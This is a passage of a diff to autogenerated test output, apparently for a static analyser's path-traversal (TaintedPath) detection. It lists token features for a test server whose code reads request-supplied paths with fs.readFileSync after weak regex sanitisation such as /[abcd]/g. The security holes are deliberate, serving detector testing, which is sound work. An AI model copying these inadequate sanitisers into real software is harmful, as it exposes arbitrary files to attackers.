/\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:7:170:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:7:170:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:7:170:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:7:170:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:7:170:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6022,6 +63890,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:170:13:170:56 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:170:16:170:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:16:170:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:16:170:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:16:170:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:16:170:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | path.re ... /g, '') | calleeImports | fs | @@ -6031,6 +63919,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:170:29:170:55 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:170:34:170:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:34:170:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:34:170:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:34:170:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:34:170:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:170:42:170:50 | /[abcd]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:170:42:170:50 | /[abcd]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:170:42:170:50 | /[abcd]/g | calleeImports | url | @@ -6049,6 +63942,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:170:53:170:54 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:170:53:170:54 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:170:53:170:54 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:3:171:55 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:7:171:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:7:171:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:7:171:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:7:171:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:7:171:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | 